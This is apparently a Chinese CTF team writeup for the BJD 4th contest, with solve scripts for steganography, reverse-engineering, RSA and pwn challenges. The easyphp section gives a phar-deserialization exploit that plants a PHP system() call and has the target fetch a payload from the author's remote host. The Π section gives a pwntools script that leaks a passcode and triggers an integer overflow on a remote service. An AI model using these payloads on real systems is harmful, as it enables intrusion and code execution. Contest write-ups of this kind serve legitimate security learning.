BJD4th联合魔法少女野队Writeup

摸了个17,依旧是很菜,但是有证书有贴纸,我好了

fakePixel

这题挺套娃的,,,期间一直问出题人hhhh,后面还是没出来呜呜,算了做多少记录多少吧

开局一个算法代码(我已经做了注释,很容易看懂,我就不做解释)

from PIL import Image
import math

def encode(text):
  length = len(text)
  width = math.ceil(length**0.5)
  picture = Image.new("RGB",(16659, 16659), 0x0)#16659默认为width
  
  x,y = 0,0
  for i in text:
    index = ord(i)        #数值转成10进制
    rgb = (0, (index & 0xFF00)>> 8, index & 0xFF)
    #设定rgb色,基本为(0,0,每位数据的本身十进制数)
    picture.putpixel((x, y),rgb) #对x,y进行上色
    if x == width - 1:#对每列逐一上色
       x = 0
       y += 1
    else:
       x += 1
  return picture

if __name__ == '__main__':
  with open("secret.txt",encoding = "utf-8") as f:
    all_text = f.read()
    
    picture = encode (all_text)
    picture.save("FakePicture.bmp")

然后基本就是直接读颜色rgb然后转数值就完事了

from PIL import Image
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
Image.MAX_IMAGE_PIXELS = None
picture=Image.open('FakePicture.bmp')
pix=picture.load()
width=picture.size[0]
for y in range(width):
    for x in range(width):
        r, g, b = pix[x, y]
        print(chr(b),end='')

导出后复制丢入HxD或者winhex,可以发现结尾是KP,经典反转

a=open('1shenm','rb').read()
f=a[::-1]
b=open('test.zip','wb').write(f)

然后又是ook,解码,解压。出视频

某一帧的sb玩意

是什么maxicode,扫码,出结果

经典

好了我找不到密文了,告辞。

easyphp

代码审计人

绕就完事了,将template变量里面的值覆盖成目标值,利用phar伪协议上传最后数组方式即可绕过,撰写phar,利用

?var[template][tp1]=http://snowywar.top/shell/phar.txt&tp=tp1

上传后进行读flag即可

?var[template][tp1]=phar://uploads/xxx/xxx.html&tp=tp1

exp.php

<?php
class Template
{
    public $content;
    public $pattern;
    public $suffix;
    
    public function __construct()
    {
        $this->content = "<?php system('/readflag');";
        $this->suffix = ".php";
        $this->pattern = "";
    }
}

$a = new Template();

$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");	
$phar->setMetadata($a); 
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

Π

在Login函数里面有sprintf配合%s的漏洞,可以把随机数passcode泄露出来,然后进入计算pai的过程 scanf 中格式化子串里面是%llu,

但是变量类型是unsigned int类型,造成了整数溢出,溢出四个字节为3.1415926即可读出flag

from pwn import *

local = 0

binary = "./pi"
# libc_path = ''
port = "10022"

while True:
	try:
	
		if local == 1:
			p = process(binary)
		else:
			p = remote("183.129.189.60",port)
		
		def dbg():
			context.log_level = 'debug'
		
		context.terminal = ['tmux','splitw','-h']
		payload = 0x40 * 'a'
		p.recvuntil('Username:')
		p.sendline(payload)
		
		p.recvuntil('a' * 0x40)
		password = p.recv(10)
		print password
		
		p.recvuntil('Passcode:')
		p.sendline(password)
		
		p.recvuntil('N =')
		p.sendline('4632251120704552960')	# 0x40490fda00000000   4632251120704552960
		
		# gdb.attach(p,"b *$rebase(178F)")
		p.interactive()
	
	except Exception as e:
		print e
		continue
			

this is easy VH

开头创建了线程

第一个函数有反调试,通过改进程名就可以

6749d4那几个函数通过调试确定

逻辑 是先变表base64,再rc4,前12个到v17

再8个:先凯撒13位,再变表base64

再16个:先rc4,再变表base64

最后异或一组数

解了半天是fakeflag= =

过掉反调试,得到 真实得变换逻辑在402d80

也是分三段,分别是rc4,变表base64,cs13。对Vftable的变换在Start,TLSCallback_0有VirtualProtect

原来还有个短斜线

import base64
import hashlib
import os
from Crypto.Cipher import AES
# from z3 import *

print(base64.b64decode(b'mtiNnduQnN6TmdeMmNqPn6=='))
print(base64.b64encode(b'1234567890123456'))
v6 = [0]*85
v6[0] = 97
v6[1] = 98
v6[2] = 99
v6[3] = 100
v6[4] = 101
v6[5] = 102
v6[6] = 103
v6[7] = 104
v6[8] = 105
v6[9] = 106
v6[10] = 107
v6[11] = 108
v6[12] = 109
v6[13] = 110
v6[14] = 111
v6[15] = 112
v6[16] = 113
v6[17] = 114
v6[18] = 115
v6[19] = 116
v6[20] = 117
v6[21] = 118
v6[22] = 119
v6[23] = 120
v6[24] = 121
v6[25] = 122
v6[26] = 48
v6[27] = 49
v6[28] = 50
v6[29] = 51
v6[30] = 52
v6[31] = 53
v6[32] = 54
v6[33] = 55
v6[34] = 56
v6[35] = 57
v6[36] = 43
v6[37] = 47
v6[38] = 65
v6[39] = 66
v6[40] = 67
v6[41] = 68
v6[42] = 69
v6[43] = 70
v6[44] = 71
v6[45] = 72
v6[46] = 73
v6[47] = 74
v6[48] = 75
v6[49] = 76
v6[50] = 77
v6[51] = 78
v6[52] = 79
v6[53] = 80
v6[54] = 81
v6[55] = 82
v6[56] = 83
v6[57] = 84
v6[58] = 85
v6[59] = 86
v6[60] = 87
v6[61] = 88
v6[62] = 89
v6[63] = 90
v6[64] = 43
v6[65] = 47
v6[66] = 33
v6[67] = 64
v6[68] = 35
v6[69] = 36
v6[70] = 37
v6[71] = 94
v6[72] = 38
v6[73] = 42
v6[74] = 40
v6[75] = 41
v6[76] = 95
v6[77] = 43
v6[78] = 60
v6[79] = 62
v6[80] = 46
v6[81] = 91
v6[82] = 93
v6[83] = 123
v6[84] = 125

print("tab:",bytes(v6))
tab = v6
otab = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
rtab = {}
for i in range(64):
    rtab[tab[i]]=ord(otab[i])
rtab[0x20]=ord('=')
def reDiyb64(b):
    f = []
    for i in b:
        f.append(rtab[i])
    return base64.b64decode(bytes(f))

target = [0x7E,0x7E,0xF4,0xA0,0x26,0x25,0x06,0x73,0x78,0x6E,0x77,0x7A,
0x78,0x6A,0x54,0x56,0x61,0x47,0x72,0x45,
0x52,0x66,0x67,0x76,0x61,0x74]


print(target[:7]) # 然后去网上解密
print(reDiyb64(bytes(target[7:7+8])))
print(reDiyb64(b'sxnwzxjT'))
print(bytes(target[15:]))# cs13
flag = 'VFtAble'+"-IsVery"+"-InTeREsting"
print(flag)
print(hashlib.md5(b'VFtAble-Very-InTeREsting').hexdigest())

rakudadou

  1. perl文件
  2. 不会perl语法于是调试尝试
  3. 字符串.flip用于翻转字符串
  4. ~运算符连接字符串
  5. p函数没看懂,大概是字符串平均分成3分,后面两份居多,然后按照1,3,2的顺序拼接
  6. flip函数没怎么看懂,但是使用了flip,也就是把字符串移位了,可以通过逆映射的方式在不用得知功能的情况下进行逆变换
  7. 最后要使用某些库显示二维码
import cv2
import numpy as np
import matplotlib.pyplot as plt
s = '11000000000000000000000000000011011001111111100110 11001111111111000011111111110011100111111000000111 11001100000011000011000000110011100001111110011001 11001100000011000011000000110011011001100001100000 11001111111111000011111111110011100110011110011001 11111111111111111111111111111111111001100000000001 00110000111111001111110011111100111000000111111001 00001111001111110000111111111100011110011110011000 11111100111100110011111111111100000110000001100000 11110011001111001111111111110000111110011111100111 11111111110011001111111111111111111001100001100111 11000011000011000000001100000000011111111001100110 11111111111111111111000000111111000000000001100000 11001111111111000011111100111111011110000111100000 11001100000011000011110000110000000001100111111000 11000000000000000000001111001100000000011111111110 11001100000011000011000000110011111110000111111001 11000000000000000000000000000011000110011001100110 00001100000000001100110011001100000001111001111110 11000000111111001100000011001111111000011001111111 11001100001111000000001100001100011111111110011110 11000000000000000000001100110011000111111000011000 11001100000011001111000000000000000111111000000000 11001100000011000011001111000011000111111000011110 11001111111111000011110000110011000000000110000000'

sa = s.split(' ')
print(sa)

tag = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'[:50]
rtag = 'PONMLKJIHGFEDCBAxwvutsrqponmlkjihQRSTUVWXYZabcdefg'
print(tag,rtag)
dic = {}
for i in range(len(tag)):
    dic[rtag[i]]=tag[i]
ndic = {}
for i in range(len(tag)):
    ndic[tag[i]]=i
rndic = {}
for i in range(len(tag)):
    rndic[ndic[rtag[i]]]=ndic[tag[i]]
print(rndic)
test = ''
for i in range(len(tag)):
    test+=rtag[rndic[i]]
print(test)
def reflip(s):
    res = ''
    for i in range(len(s)):
        res+=s[rndic[i]]
    return res
print(reflip(rtag))
qr = ''
qa = []
cnt = 0
while cnt<25:
    
    tmp = sa[cnt]
    tmp = reflip(tmp)
    tmp = tmp.replace('1',' ',-1)
    tmp = tmp.replace('0','#',-1)
    qr+=tmp+'\n'
    qa.append(tmp)
    cnt+=1
    if cnt>=25:
        break
    tmp = sa[cnt]
    tmp = reflip(tmp)
    tmp = tmp.replace('1',' ',-1)
    tmp = tmp.replace('0','#',-1)
    qr+=tmp+'\n'
    cnt+=1
    qa.append(tmp)
print(len(qa))

index = [24,23,21,20,19,17,15,14,13,11,9,8,7,5,3,0,22,18,16,12,10,6,4,2,1]
rind = {}
for i in range(len(index)):
    rind[index[i]]=i
for i in range(len(qa)):
    print(qa[rind[i]])
rqa = []
for i in range(len(qa)):
    r = []
    for i in qa[rind[i]]:
        if i=='#':
            r.append([0,0,0])
        else :
            r.append([255,255,255])
    rqa.append(r)
    rqa.append(r)
img = np.asarray(rqa)
plt.imshow(img)
plt.show()

asa

两次使用了相同的p,所以p是两个n的最大公约数,这样就容易求了

import gmpy2
from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes
n1 = 0x661d752110bcc6ee5ca33edaf244716cccce6400dfdbfd84ce6ae2d8fbbeb2f61584da7668768403b6135e7810eae9d4d8e044935f8680de5324c3fc0f9bffb01812f9d2ac9055ee8dbd17b90c5a60cb7595a82f24a075d951db3b7f913b8543ecd52b8c8464ce348c3970d511ae911e814f9ca33b8412db2730e61820f5de47
n2 = 0x9f159326c907441326c88d17eae1c6e8aaea23922c5e628a585294e379e9245644f9c249c57f54a2b83921b4adc988fecc90c00feb6936d9be1f3a5ffae951b74ffbc6fc7aa11743e4ca179a937392dacf931e820d1d83016562ff608e8c59ef7310654a09bbba4a0129f71dcb61bd9bef073bbb93bfcac4a7a2e81156dbb32d
p = gmpy2.gcd(n1,n2)
print(p)
q1 = n1//p
q2 = n2//p
e = 65537
d1 = gmpy2.invert(e,(p-1)*(q1-1))
d2 = gmpy2.invert(e,(p-1)*(q2-1))
keyc = 0xd7931796fa39cfa37c0b621c01175904206dff1d74a28369dcd6517957ed76c5eb7d4934cbeb902119f9215f9ae7926debe3abe856244b45dbb4caaa2b93dbb79a3ca1a9813e1466c49fe3c03e5462811afbf3f40ff79927f9fe3681b7f3cef34466b9a736512f4931b5026eefacbae9be6e408085a7a636c514574c3b22ffe
ivc = 0x6240740d41a539a88634726cf0a791a87e02419c3c3e00dff62eba59e81a93fd04a59109e57f64fc375b9a321583b6fa133317eb5c4e6eb1e6f6d9a0b4ae6ff0c54423718811f7956cd63b7bf9c7f8e29f48dad8f05b63b71d6c5112d91864adba0d6bb342c67aee39ccd5e2a6928a8e4ab2248d29a0c990bae821b31b39b1f3
c = 'f8559d671b720cd336f2d8518ad6eac8c405585158dfde74ced376ba42d9fe984d519dc185030ddec7b4dc240fd90fa8'
c = long_to_bytes(int(c,base=16))
key = gmpy2.powmod(keyc,d1,n1)
iv = gmpy2.powmod(ivc,d2,n2)
print(long_to_bytes(key))
key = long_to_bytes(key)
iv = long_to_bytes(iv)
aes = AES.new(key=key,iv=iv,mode=AES.MODE_CBC)
print(aes.decrypt(c))

马保国

拿到手是一张图片,首先尝试对所有的二维码解码。解出来的内容无规律,遂放弃该思路。

将压缩包后缀改为zip,用360解压打开,可以发现一张图片,将其后缀改为jpg,发现了许多不寻常的二维码,考虑在图片中隐含了信息。

可以得到压缩包的解压密码,打开之后是某某编码,写脚本转换即可

short ok编码,转换后的内容为

. . . . . . . . . . . . . . .. ! ? ! ! . ? . . . . . . . .. . . . . . . . ? . ? ! . ? .. . . . . . . ! . ! ! ! ! ! !! . ? . . . . . . . . . ! ? !! . ? . . . . . . . . ? . ? !. ? . . . . ! . ? . . . . . .. . . ! ? ! ! . ? ! ! ! ! ! !! ! ? . ? ! . ? ! . ? . . . .. . . . . ! ? ! ! . ? . . . .. . . . ? . ? ! . ? . . ! . ?. . . . . . . ! ? ! ! . ? ! !! ! ! ! ? . ? ! . ? ! ! ! ! !! ! ! ! ! ! . ? . . . . . . .. . . . . . . . ! ? ! ! . ? .. . . . . . . . . . . . . ? .? ! . ? . . . . . . . . ! . ?. . . . . . . . . ! ? ! ! . ?! ! ! ! ! ! ! ! ? . ? ! . ? !! ! ! ! ! ! ! ! ! ! . ? . . .. . . . . . . . . . ! ? ! ! .? ! ! ! ! ! ! ! ! ! ! ! ! ? .? ! . ? ! ! ! ! ! ! ! ! ! ! !! ! ! ! ! ! ! ! ! ! ! ! . . .. . ! . ? . . . . . . . . . .. . . ! ? ! ! . ? . . . . . .. . . . . . ? . ? ! . ? . . .. . . . . . . . . . . . . . .! . ? . . . . . . . . . . . .. . . ! ? ! ! . ? ! ! ! ! ! !! ! ! ! ! ! ! ! ? . ? ! . ? !! ! ! ! ! ! . . . . . . . . .. . . . ! . ? . . . . . . . .. . . . . ! ? ! ! . ? . . . .. . . . . . . . ? . ? ! . ? .. . . . . . . . . . . . . . .. . . . ! . ? . . . . . . . .. . . . . . . ! ? ! ! . ? ! !! ! ! ! ! ! ! ! ! ! ! ! ? . ?! . ? ! ! ! ! ! . ! ! ! ! ! !! . . . . . ! . . . ! . ! ! !. ? . . . . . . . . . . . . .. . ! ? ! ! . ? . . . . . . .. . . . . . . ? . ? ! . ? . .. . ! . ? . . . . . . . . . .. . . . . ! ? ! ! . ? ! ! ! !! ! ! ! ! ! ! ! ! ! ? . ? ! .? ! ! ! ! ! . . . . . . . . .! . ? . . . . . . . . . . . .. ! ? ! ! . ? . . . . . . . .. . . . ? . ? ! . ? . . . . .. . . . . . . . . ! . ? . . .. . . . . . . . . . ! ? ! ! .? ! ! ! ! ! ! ! ! ! ! ! ! ? .? ! . ? ! ! ! ! ! ! ! ! ! ! !! ! ! ! ! ! ! ! ! ! ! ! . ? .. . . . . . . . . . . . . . !? ! ! . ? . . . . . . . . . .. . . . ? . ? ! . ? . . . . .. ! . ? . . . . . . . . . . .. . . . ! ? ! ! . ? ! ! ! ! !! ! ! ! ! ! ! ! ! ? . ? ! . ?! . ! ! ! ! ! ! ! ! ! . ? . .. . . . . . . . . . . . . ! ?! ! . ? . . . . . . . . . . .. . . ? . ? ! . ? ! . ? . . .. . . . . . . . . . ! ? ! ! .? ! ! ! ! ! ! ! ! ! ! ! ! ? .? ! . ? ! ! ! ! ! ! ! ! ! ! !! ! ! ! ! ! . ? . . . . . . .. . . . . . ! ? ! ! . ? . . .. . . . . . . . . ? . ? ! . ?. . . . . . . . . . . . . . .. ! . ? . . . . . . . . . . .. . ! ? ! ! . ? ! ! ! ! ! ! !! ! ! ! ! ? . ? ! . ? ! ! ! !! ! ! ! ! ! ! ! ! ! ! . ! ! !! ! . ! ! ! ! ! . . . . . ! .! . ? . . . . . . . . . . . .. ! ? ! ! . ? . . . . . . . .. . . . ? . ? ! . ? . . . . .. . . . . . . . . . . ! . . .. . . . . . . . ! . ! ! ! ! !! ! ! ! ! ! . ? . . . . . . .. . . . . . ! ? ! ! . ? ! ! !! ! ! ! ! ! ! ! ! ? . ? ! . ?! ! ! ! ! ! ! ! ! . ? . . . .. . . . . . . . . . . . . ! ?! ! . ? . . . . . . . . . . .. . . . . ? . ? ! . ? . . . .. . . . ! . ? .

经典ook,爪巴

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 共1条
    • 魔法少女雪殇
    • 十八年,磨砺。1
      taiqiangle
      4月前